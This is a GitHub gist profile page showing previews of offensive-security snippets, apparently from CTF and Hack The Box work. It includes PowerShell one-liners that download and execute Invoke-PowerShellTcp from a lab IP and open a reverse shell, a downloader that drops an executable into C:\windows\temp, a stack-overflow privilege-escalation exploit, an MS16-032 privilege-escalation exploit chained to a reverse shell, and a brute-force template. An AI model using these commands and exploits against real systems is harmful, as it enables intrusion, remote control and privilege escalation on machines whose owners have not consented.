Skip to content

Instantly share code, notes, and snippets.

View intrd's full-sized avatar
💭
Things do not change, we change (silently).

intrd

💭
Things do not change, we change (silently).
86 followers · 73 following
View GitHub Profile
@intrd
intrd / Invoke-PowerShellTcp.ps1
Created November 16, 2017 18:38
Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang
#Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
@intrd
intrd / powershell_download_exec.ps1
Last active November 19, 2021 12:29
Powershell download & execute (anyver)
# Powershell download & execute (anyver)
# http://dann.com.br/
# Invoke-PowerShellTcp.ps1 (Reverse powershell) - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626
powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002
@intrd
intrd / casino2.py
Created October 24, 2017 14:19
casino 2 - prog150 @ hackaflag 2017 - porto alegre
#!/usr/bin/python
## casino 2 - prog150 @ hackaflag 2017 - porto alegre
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
@intrd
intrd / cry_t0k3n_brute.py
Last active September 21, 2017 10:51
Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
## Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import sys,Queue,threading,hashlib,os,time
from subprocess import Popen, PIPE, STDOUT
NumOfThreads=5
queue = Queue.Queue()
@intrd
intrd / sneaky_priv_esc_xpl.py
Last active April 14, 2018 18:35
Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
#!/usr/bin/python
## Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
# @author intrd - http://dann.com.br/
import struct
exploit = "A"*362
#exploit += struct.pack("I",0xffffd638+10) #topstack local
#exploit += "\xCC"*4
exploit += struct.pack("I",0xbffff6e8+10) #topstack remote
@intrd
intrd / powershell_wget_oneliner.ps1
Last active October 16, 2021 11:33
Powershell WGET one-liner (anyver)
# Powershell oneliner wget (anyver)
# http://dann.com.br/
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')
@intrd
intrd / ghost_disable_google_amp.md
Last active July 4, 2017 15:52
Ghost blogs - fast tip to disable Google AMP

Google AMP is shit! we don't need this fucking our layouts..

Go to /core/server/config/index.js

        internalApps: ['private-blogging', 'subscribers', 'amp'],
        slugs: {
            // Used by generateSlug to generate slugs for posts, tags, users, ..
            // reserved slugs are reserved but can be extended/removed by apps
            // protected slugs cannot be changed or removed
            reserved: ['admin', 'app', 'apps', 'archive', 'archives', 'categories',
@intrd
intrd / hackaflag2017-jp_prog300-encoding.py
Last active April 14, 2018 18:35
Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
# -*- coding: utf-8 -*-
#!/usr/bin/python
## Encoding solution - prog300 @ hackaflag 2017 - joao pessoa
# @author intrd - http://dann.com.br/ + pwn4food team
# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat
@intrd
intrd / ms16_032_intrd_mod.ps1
Last active October 16, 2021 11:33
Win7-Win10 & 2k8-2k12 <== 32/64bit privilege escalation (MS16-032 exploit modded) - command argv + reverse shell
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv
# Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE"
# To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
@intrd
intrd / asterisk_bruteforce.py
Last active June 22, 2017 03:20
Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
## Nozzlr template : RAW Asterisk Call Management 1.1 (port 5038) - PoC tested on Asterisk Call Manager 1.1 / FPBX-2.8.1(1.8.7.0), maybe still working on future versions.
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# Make a copy of this template and adapt to your task!
import sys, time
sys.path.append("libs/")
from int_netcat import Netcat